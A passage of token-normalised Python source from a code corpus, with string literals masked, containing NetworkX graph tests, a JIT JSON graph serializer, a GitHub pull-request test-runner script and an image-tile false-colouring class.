( sorted ( f ( <NUM_LIT:3> ) [ <NUM_LIT:0> ] . edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ] ) <EOL> assert_equal ( sorted ( f ( <NUM_LIT:4> ) [ <NUM_LIT:0> ] . edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] ) <EOL> assert_equal ( sorted ( f ( <NUM_LIT:4> ) [ <NUM_LIT:1> ] . edges ( ) ) , [ ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:3> ) ] ) <EOL> def test_nonisomorphic_trees_matrix ( self ) : <EOL> trees_2 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:2> , create = "<STR_LIT>" ) ) , trees_2 ) <EOL> trees_3 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:3> , create = "<STR_LIT>" ) ) , trees_3 ) <EOL> trees_4 = [ [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> ] , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] , <EOL> [ [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , [ <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] ] <EOL> assert_equal ( list ( nx . nonisomorphic_trees ( <NUM_LIT:4> , create = "<STR_LIT>" ) ) , trees_4 ) </s>
<s> """<STR_LIT>""" <EOL> import json <EOL> import networkx as nx <EOL> from networkx . utils . decorators import not_implemented_for <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> def jit_graph ( data ) : <EOL> """<STR_LIT>""" <EOL> G = nx . Graph ( ) <EOL> for node in data : <EOL> G . add_node ( node [ '<STR_LIT:id>' ] , ** node [ '<STR_LIT:data>' ] ) <EOL> if node . get ( '<STR_LIT>' ) is not None : <EOL> for adj in node [ '<STR_LIT>' ] : <EOL> G . add_edge ( node [ '<STR_LIT:id>' ] , adj [ '<STR_LIT>' ] , ** adj [ '<STR_LIT:data>' ] ) <EOL> return G <EOL> @ not_implemented_for ( '<STR_LIT>' ) <EOL> def jit_data ( G , indent = None ) : <EOL> """<STR_LIT>""" <EOL> json_graph = [ ] <EOL> for node in G . nodes ( ) : <EOL> json_node = { <EOL> "<STR_LIT:id>" : node , <EOL> "<STR_LIT:name>" : node <EOL> } <EOL> json_node [ "<STR_LIT:data>" ] = G . node [ node ] <EOL> if G [ node ] : <EOL> json_node [ "<STR_LIT>" ] = [ ] <EOL> for neighbour in G [ node ] : <EOL> adjacency = { <EOL> "<STR_LIT>" : neighbour , <EOL> } <EOL> adjacency [ "<STR_LIT:data>" ] = G . edge [ node ] [ neighbour ] <EOL> json_node [ "<STR_LIT>" ] . append ( adjacency ) <EOL> json_graph . append ( json_node ) <EOL> return json . dumps ( json_graph , indent = indent ) </s>
<s> from nose . tools import * <EOL> import networkx as nx <EOL> from networkx . testing import * <EOL> class _GenericTest ( object ) : <EOL> def _test_equal ( self , a , b ) : <EOL> self . _assert_func ( a , b ) <EOL> def _test_not_equal ( self , a , b ) : <EOL> try : <EOL> self . _assert_func ( a , b ) <EOL> passed = True <EOL> except AssertionError : <EOL> pass <EOL> else : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestNodesEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . _assert_func = assert_nodes_equal <EOL> def test_nodes_equal ( self ) : <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> ] <EOL> b = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> self . _test_equal ( a , b ) <EOL> def test_nodes_not_equal ( self ) : <EOL> a = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , <NUM_LIT:4> ] <EOL> b = [ <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:1> , <NUM_LIT:3> ] <EOL> self . _test_not_equal ( a , b ) <EOL> def test_nodes_with_data_equal ( self ) : <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> H = nx . Graph ( ) <EOL> H . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> self . _test_equal ( G . nodes ( data = True ) , H . nodes ( data = True ) ) <EOL> def test_edges_with_data_not_equal ( self ) : <EOL> G = nx . Graph ( ) <EOL> G . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> H = nx . Graph ( ) <EOL> H . add_nodes_from ( [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , color = '<STR_LIT>' ) <EOL> self . _test_not_equal ( G . nodes ( data = True ) , H . nodes ( data = True ) ) <EOL> class TestEdgesEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . _assert_func = assert_edges_equal <EOL> def test_edges_equal ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> self . _test_equal ( a , b ) <EOL> def test_edges_not_equal ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:3> ) ] <EOL> self . _test_not_equal ( a , b ) <EOL> def test_edges_with_data_equal ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> nx . add_path ( G , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> self . _test_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_edges_with_data_not_equal ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> nx . add_path ( G , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:1> ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , weight = <NUM_LIT:2> ) <EOL> self . _test_not_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_no_edges ( self ) : <EOL> G = nx . MultiGraph ( ) <EOL> H = nx . MultiGraph ( ) <EOL> self . _test_equal ( G . edges ( data = True , keys = True ) , <EOL> H . edges ( data = True , keys = True ) ) <EOL> def test_duplicate_edges ( self ) : <EOL> a = [ ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:5> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> b = [ ( <NUM_LIT:4> , <NUM_LIT:5> ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ] <EOL> self . _test_not_equal ( a , b ) <EOL> class TestGraphsEqual ( _GenericTest ) : <EOL> def setUp ( self ) : <EOL> self . _assert_func = assert_graphs_equal <EOL> def test_graphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_digraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . DiGraph ( ) ) <EOL> H = nx . DiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_multigraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . MultiGraph ( ) ) <EOL> H = nx . MultiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_multigraphs_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> , create_using = nx . MultiDiGraph ( ) ) <EOL> H = nx . MultiDiGraph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_equal ( G , H ) <EOL> def test_graphs_not_equal ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_cycle ( H , range ( <NUM_LIT:4> ) ) <EOL> self . _test_not_equal ( G , H ) <EOL> def test_graphs_not_equal2 ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:3> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_not_equal ( G , H ) <EOL> def test_graphs_not_equal3 ( self ) : <EOL> G = nx . path_graph ( <NUM_LIT:4> ) <EOL> H = nx . Graph ( ) <EOL> nx . add_path ( H , range ( <NUM_LIT:4> ) ) <EOL> H . name = '<STR_LIT>' <EOL> self . _test_not_equal ( G , H ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> import errno <EOL> from glob import glob <EOL> import io <EOL> import json <EOL> import os <EOL> import pickle <EOL> import re <EOL> import requests <EOL> import shutil <EOL> import time <EOL> from subprocess import call , check_call , check_output , PIPE , STDOUT , CalledProcessError <EOL> import sys <EOL> import gh_api <EOL> from gh_api import Obj <EOL> basedir = os . path . join ( os . path . expanduser ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> repodir = os . path . join ( basedir , "<STR_LIT>" ) <EOL> nx_repository = '<STR_LIT>' <EOL> nx_http_repository = '<STR_LIT>' <EOL> gh_project = "<STR_LIT>" <EOL> supported_pythons = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> missing_libs_re = re . compile ( '<STR_LIT>' ) <EOL> def get_missing_libraries ( log ) : <EOL> libs = set ( ) <EOL> for line in log . split ( '<STR_LIT:\n>' ) : <EOL> m = missing_libs_re . search ( line ) <EOL> if m : <EOL> libs . add ( m . group ( <NUM_LIT:1> ) . lower ( ) ) <EOL> if libs : <EOL> return "<STR_LIT:U+002CU+0020>" . join ( libs ) <EOL> skipped_re = re . compile ( '<STR_LIT>' ) <EOL> def get_skipped ( log ) : <EOL> m = skipped_re . search ( log ) <EOL> if m : <EOL> return m . group ( <NUM_LIT:1> ) <EOL> number_tests_re = re . compile ( '<STR_LIT>' ) <EOL> def get_number_tests ( log ) : <EOL> m = number_tests_re . search ( log ) <EOL> if m : <EOL> return m . group ( <NUM_LIT:1> ) <EOL> class TestRun ( object ) : <EOL> def __init__ ( self , pr_num ) : <EOL> self . unavailable_pythons = [ ] <EOL> self . venvs = [ ] <EOL> self . pr_num = pr_num <EOL> self . pr = gh_api . get_pull_request ( gh_project , pr_num ) <EOL> self . setup ( ) <EOL> self . results = [ ] <EOL> def available_python_versions ( self ) : <EOL> """<STR_LIT>""" <EOL> for py in supported_pythons : <EOL> try : <EOL> check_call ( [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] , stdout = PIPE ) <EOL> yield py <EOL> except ( OSError , CalledProcessError ) : <EOL> self . unavailable_pythons . append ( py ) <EOL> def setup ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> os . mkdir ( basedir ) <EOL> except OSError as e : <EOL> if e . errno != errno . EEXIST : <EOL> raise <EOL> os . chdir ( basedir ) <EOL> for venv in glob ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( venv ) <EOL> for py in self . available_python_versions ( ) : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , py , <EOL> '<STR_LIT>' , '<STR_LIT>' % py ] ) <EOL> self . venvs . append ( ( py , '<STR_LIT>' % py ) ) <EOL> if not os . path . exists ( '<STR_LIT>' ) : <EOL> try : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_repository ] ) <EOL> except CalledProcessError : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_http_repository ] ) <EOL> os . chdir ( repodir ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> try : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except CalledProcessError : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , nx_http_repository , '<STR_LIT>' ] ) <EOL> self . master_sha = check_output ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] ) . decode ( '<STR_LIT:ascii>' ) . strip ( ) <EOL> os . chdir ( basedir ) <EOL> def get_branch ( self ) : <EOL> repo = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> os . chdir ( repodir ) <EOL> if mergeable : <EOL> merged_branch = "<STR_LIT>" % ( owner , branch ) <EOL> call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , merged_branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , merged_branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , repo , branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , "<STR_LIT>" % ( repo , branch ) ] ) <EOL> else : <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , repo , branch ] ) <EOL> check_call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> os . chdir ( basedir ) <EOL> def markdown_format ( self ) : <EOL> def format_result ( result ) : <EOL> s = "<STR_LIT>" % result . py <EOL> if result . passed : <EOL> s += "<STR_LIT>" % ( ok , result . skipped , result . num_tests ) <EOL> else : <EOL> s += "<STR_LIT>" % ( fail , result . log_url ) <EOL> if result . missing_libraries : <EOL> s += "<STR_LIT>" + result . missing_libraries + "<STR_LIT:)>" <EOL> return s <EOL> pr_num = self . pr_num <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch_url = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] + '<STR_LIT>' + branch <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> master_sha = self . master_sha <EOL> branch_sha = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] <EOL> ok = '<STR_LIT>' <EOL> fail = '<STR_LIT>' <EOL> header = "<STR_LIT>" % pr_num <EOL> header += "<STR_LIT>" % ( owner , branch , branch_url ) <EOL> if mergeable : <EOL> mrg = "<STR_LIT>" % ok <EOL> else : <EOL> mrg = "<STR_LIT>" % fail <EOL> mrg += "<STR_LIT>" % ( branch_sha , master_sha ) <EOL> lines = [ header , <EOL> mrg , <EOL> "<STR_LIT>" + sys . platform , <EOL> "<STR_LIT>" ] + [ format_result ( r ) for r in self . results ] <EOL> if self . unavailable_pythons : <EOL> lines += [ "<STR_LIT>" , <EOL> "<STR_LIT>" + "<STR_LIT:U+002CU+0020>" . join ( self . unavailable_pythons ) ] <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> def post_results_comment ( self ) : <EOL> body = self . markdown_format ( ) <EOL> gh_api . post_issue_comment ( gh_project , self . pr_num , body ) <EOL> def print_results ( self ) : <EOL> pr_num = self . pr_num <EOL> branch = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> branch_url = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] + '<STR_LIT>' + branch <EOL> owner = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> mergeable = self . pr [ '<STR_LIT>' ] <EOL> master_sha = self . master_sha <EOL> branch_sha = self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] <EOL> print ( "<STR_LIT:\n>" ) <EOL> print ( "<STR_LIT>" % pr_num , <EOL> "<STR_LIT>" % ( owner , branch , branch_url ) ) <EOL> if mergeable : <EOL> mrg = "<STR_LIT>" <EOL> else : <EOL> mrg = "<STR_LIT>" <EOL> mrg += "<STR_LIT>" % ( branch_sha , master_sha ) <EOL> print ( mrg ) <EOL> print ( "<STR_LIT>" , sys . platform ) <EOL> for result in self . results : <EOL> if result . passed : <EOL> print ( result . py , "<STR_LIT::>" , "<STR_LIT>" % ( result . skipped , result . num_tests ) ) <EOL> else : <EOL> print ( result . py , "<STR_LIT::>" , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , result . get ( '<STR_LIT>' ) or result . log_file ) <EOL> if result . missing_libraries : <EOL> print ( "<STR_LIT>" , result . missing_libraries ) <EOL> if self . unavailable_pythons : <EOL> print ( "<STR_LIT>" , <EOL> "<STR_LIT:U+002CU+0020>" . join ( self . unavailable_pythons ) ) <EOL> def dump_results ( self ) : <EOL> with open ( os . path . join ( basedir , '<STR_LIT>' ) , '<STR_LIT:wb>' ) as f : <EOL> pickle . dump ( self , f ) <EOL> @ staticmethod <EOL> def load_results ( ) : <EOL> with open ( os . path . join ( basedir , '<STR_LIT>' ) , '<STR_LIT:rb>' ) as f : <EOL> return pickle . load ( f ) <EOL> def save_logs ( self ) : <EOL> for result in self . results : <EOL> if not result . passed : <EOL> result_locn = os . path . abspath ( os . path . join ( '<STR_LIT>' % result . py , <EOL> self . pr [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ : <NUM_LIT:7> ] + "<STR_LIT>" ) ) <EOL> with io . open ( result_locn , '<STR_LIT:w>' , encoding = '<STR_LIT:utf-8>' ) as f : <EOL> f . write ( result . log ) <EOL> result . log_file = result_locn <EOL> def post_logs ( self ) : <EOL> for result in self . results : <EOL> if not result . passed : <EOL> result . log_url = gh_api . post_gist ( result . log , <EOL> description = '<STR_LIT>' , <EOL> filename = "<STR_LIT>" , auth = True ) <EOL> def run ( self ) : <EOL> for py , venv in self . venvs : <EOL> tic = time . time ( ) <EOL> passed , log = run_tests ( venv ) <EOL> elapsed = int ( time . time ( ) - tic ) <EOL> print ( "<STR_LIT>" % ( py , elapsed ) ) <EOL> missing_libraries = get_missing_libraries ( log ) <EOL> skipped = get_skipped ( log ) <EOL> num_tests = get_number_tests ( log ) <EOL> self . results . append ( Obj ( py = py , <EOL> passed = passed , <EOL> log = log , <EOL> missing_libraries = missing_libraries , <EOL> skipped = skipped , <EOL> num_tests = num_tests <EOL> ) <EOL> ) <EOL> def run_tests ( venv ) : <EOL> version = venv . split ( '<STR_LIT:->' ) [ <NUM_LIT:1> ] <EOL> py = os . path . join ( basedir , venv , '<STR_LIT>' , '<STR_LIT>' ) <EOL> os . chdir ( repodir ) <EOL> if os . path . exists ( '<STR_LIT>' ) : <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" % py ) <EOL> logfile = os . path . join ( basedir , venv , '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" % logfile ) <EOL> with open ( logfile , '<STR_LIT:wb>' ) as f : <EOL> check_call ( [ py , '<STR_LIT>' , '<STR_LIT>' ] , stderr = STDOUT , stdout = f ) <EOL> os . chdir ( basedir ) <EOL> os . environ . pop ( "<STR_LIT>" , None ) <EOL> try : <EOL> cmd_file = [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] <EOL> nx_file = check_output ( cmd_file , stderr = STDOUT ) <EOL> except CalledProcessError as e : <EOL> return False , e . output . decode ( '<STR_LIT:utf-8>' ) <EOL> nx_file = nx_file . strip ( ) . decode ( '<STR_LIT:utf-8>' ) <EOL> if not nx_file . startswith ( os . path . join ( basedir , venv ) ) : <EOL> msg = u"<STR_LIT>" % nx_file <EOL> msg += u"<STR_LIT>" <EOL> print ( msg , file = sys . stderr ) <EOL> return False , msg <EOL> print ( "<STR_LIT>" % version ) <EOL> cmd = [ py , '<STR_LIT:-c>' , '<STR_LIT>' ] <EOL> try : <EOL> return True , check_output ( cmd , stderr = STDOUT ) . decode ( '<STR_LIT:utf-8>' ) <EOL> except CalledProcessError as e : <EOL> return False , e . output . decode ( '<STR_LIT:utf-8>' ) <EOL> def test_pr ( num , post_results = True ) : <EOL> if post_results : <EOL> gh_api . get_auth_token ( ) <EOL> testrun = TestRun ( num ) <EOL> testrun . get_branch ( ) <EOL> testrun . run ( ) <EOL> testrun . dump_results ( ) <EOL> testrun . save_logs ( ) <EOL> testrun . print_results ( ) <EOL> if post_results : <EOL> results_urls = testrun . post_logs ( ) <EOL> testrun . post_results_comment ( ) <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> post_script = os . path . join ( os . path . dirname ( sys . argv [ <NUM_LIT:0> ] ) , "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , post_script ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> parser = argparse . ArgumentParser ( description = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , <EOL> help = "<STR_LIT>" ) <EOL> parser . add_argument ( '<STR_LIT>' , type = int , help = "<STR_LIT>" ) <EOL> args = parser . parse_args ( ) <EOL> import requests <EOL> major , minor , rev = map ( int , requests . __version__ . split ( '<STR_LIT:.>' ) ) <EOL> if major == <NUM_LIT:0> and minor < <NUM_LIT:10> : <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" . format ( major , minor , rev ) ) <EOL> print ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> test_pr ( args . number , post_results = args . publish ) </s>
<s> import sys <EOL> import tempfile <EOL> import numpy as np <EOL> import zlib <EOL> import cStringIO <EOL> from PIL import Image <EOL> import pylibmc <EOL> import time <EOL> import restargs <EOL> import ocpcadb <EOL> import ocpcaproj <EOL> import ocpcarest <EOL> import django <EOL> import posix_ipc <EOL> import re <EOL> from ocpca_cy import recolor_cy <EOL> import logging <EOL> logger = logging . getLogger ( "<STR_LIT>" ) <EOL> class ColorCatmaid : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> """<STR_LIT>""" <EOL> self . db = None <EOL> self . mc = pylibmc . Client ( [ "<STR_LIT:127.0.0.1>" ] , binary = True , behaviors = { "<STR_LIT>" : True , "<STR_LIT>" : True } ) <EOL> def __del__ ( self ) : <EOL> pass <EOL> def loadDB ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . db == None : <EOL> [ self . db , self . proj , self . projdb ] = ocpcarest . loadDBProj ( self . token ) <EOL> def buildKey ( self , res , xtile , ytile , zslice , color , brightness ) : <EOL> return '<STR_LIT>' . format ( self . token , self . tilesz , self . channel , res , xtile , ytile , zslice , color , brightness ) <EOL> def falseColor ( self , tile , color ) : <EOL> """<STR_LIT>""" <EOL> data32 = np . uint32 ( tile ) <EOL> if color == '<STR_LIT:C>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) + np . left_shift ( data32 , <NUM_LIT:16> ) <EOL> elif color == '<STR_LIT:Y>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) + data32 <EOL> elif color == '<STR_LIT:M>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:16> ) + data32 <EOL> if color == '<STR_LIT:R>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + data32 <EOL> elif color == '<STR_LIT>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:8> ) <EOL> elif color == '<STR_LIT:B>' or color == '<STR_LIT>' : <EOL> fcdata = <NUM_LIT> + np . left_shift ( data32 , <NUM_LIT:16> ) <EOL> return fcdata <EOL> def tile2WebPNG ( self , tile , color , brightness ) : <EOL> """<STR_LIT>""" <EOL> if tile . dtype == np . uint16 : <EOL> tile = np . uint8 ( tile / <NUM_LIT> ) <EOL> if tile . dtype != np . uint8 : <EOL> raise ( "<STR_LIT>" % ( tile . dtype ) ) <EOL> else : <EOL> tile = self . falseColor ( tile , color ) <EOL> img = Image . frombuffer ( '<STR_LIT>' , [ self . tilesz , self . tilesz ] , tile . flatten ( ) , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> if brightness != None : <EOL> from PIL import ImageEnhance <EOL> enhancer = ImageEnhance . Brightness ( img ) <EOL> img = enhancer . enhance ( brightness ) <EOL> return img <EOL> def cacheMiss ( self , res , xtile , ytile , zslice , color , brightness ) : <EOL> """<STR_LIT>""" <EOL> self . loadDB ( ) <EOL> if self . tilesz % self . proj . datasetcfg . cubedim [ res ] [ <NUM_LIT:0> ] != <NUM_LIT:0> or self . tilesz % self . proj . datasetcfg . cubedim [ res ] [ <NUM_LIT:1> ] : <EOL> raise ( "<STR_LIT>" ) <EOL> xstart = xtile * self . tilesz <EOL> ystart = ytile * self . tilesz <EOL> xend = min ( ( xtile + <NUM_LIT:1> ) * self . tilesz , self . proj . datasetcfg . imagesz [ res ] [ <NUM_LIT:0> ] ) <EOL> yend = min ( ( ytile + <NUM_LIT:1> ) * self . tilesz , self . proj . datasetcfg . imagesz [ res ] [ <NUM_LIT:1> ] ) <EOL> imageargs = '<STR_LIT>' . format ( self . channel , res , xstart , xend , ystart , yend , zslice ) <EOL> cb = ocpcarest . xySlice ( imageargs , self . proj , self . db ) <EOL> if cb . data . shape != ( <NUM_LIT:1> , self . tilesz , self . tilesz ) : <EOL> tiledata = np . zeros ( ( self . tilesz , self . tilesz ) , cb . data . dtype ) <EOL> tiledata [ <NUM_LIT:0> : ( ( yend - <NUM_LIT:1> ) % self . tilesz + <NUM_LIT:1> ) , <NUM_LIT:0> : ( ( xend - <NUM_LIT:1> ) % self . tilesz + <NUM_LIT:1> ) ] = cb . data [ <NUM_LIT:0> , : , : ] <EOL> else : <EOL> tiledata = cb . data <EOL> return self . tile2WebPNG ( tiledata , color , brightness ) <EOL> def getTile ( self , webargs ) : <EOL> """<STR_LIT>""" <EOL> self . token , tileszstr , self . channel , resstr , xtilestr , ytilestr , zslicestr , color , brightnessstr , rest = webargs . split ( '<STR_LIT:/>' , <NUM_LIT:9> ) <EOL> self . loadDB ( ) <EOL> with closing ( ocpcaproj . OCPCAProjectsDB ( ) ) as projdb : <EOL> self . proj = projdb . loadProject ( self . token ) <EOL> with closing ( ocpcadb . OCPCADB ( self . proj ) ) as self . db : <EOL> xtile = int ( xtilestr ) <EOL> ytile = int ( ytilestr ) <EOL> res = int ( resstr ) <EOL> zslice = int ( zslicestr ) - self . proj . datasetcfg . slicerange [ <NUM_LIT:0> ] <EOL> self . tilesz = int ( tileszstr ) <EOL> brightness = float ( brightnessstr ) <EOL> mckey = self . buildKey ( res , xtile , ytile , zslice , color , brightness ) <EOL> tile = self . mc . get ( mckey ) <EOL> if tile != None : <EOL> fobj = cStringIO . StringIO ( tile ) <EOL> else : <EOL> img = self . cacheMiss ( res , xtile , ytile , zslice , color , brightness ) <EOL> fobj = cStringIO . StringIO ( ) <EOL> img . save ( fobj , "<STR_LIT>" ) <EOL> self . mc . set ( mckey , fobj . getvalue ( ) ) <EOL> fobj . seek ( <NUM_LIT:0> ) <EOL> return fobj </s>
<s> from django . contrib import admin </s>
